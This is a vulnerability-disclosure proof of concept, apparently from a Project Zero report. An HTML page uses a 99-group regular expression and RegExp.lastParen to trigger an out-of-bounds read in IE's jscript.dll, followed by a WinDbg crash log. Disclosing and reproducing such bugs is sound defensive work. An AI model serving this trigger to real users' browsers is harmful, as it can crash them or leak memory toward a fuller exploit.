<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1382

There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):

PoC for IE (note: page heap might be required to observe the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<!-- IE=8 document mode; presumably this is what routes the script to the legacy jscript engine that this PoC exercises — confirm -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
// Repro for the jscript.dll out-of-bounds read described above.
// Array(100).join('()') yields a pattern of 99 empty capture groups;
// searching the empty string with it and then reading the legacy
// RegExp.lastParen property is what reaches jscript!RegExpFncObj::LastParen
// in the debug log below (the fault is a read at [rbx+rcx*8+0ACh]).
// NOTE(review): rcx=0x63 (decimal 99) at the faulting instruction equals the
// group count, so the read index appears to track the number of groups —
// inferred from the register dump, not confirmed.
// Kept as legacy (ES3-level) JScript on purpose; modern string/regex helpers
// are not available in that engine.
function go() {
  var r= new RegExp(Array(100).join('()'));
  ''.search(r);
  alert(RegExp.lastParen);
}
go();
</script>
<!--
=========================================
Debug log:
=========================================
(cec.a14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> r
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
 r8=00000000130f9210  r9=0000000000000000 r10=000000000463fef0
r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
r14=00000000130f9210 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> k
 # Child-SP          RetAddr           Call Site
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->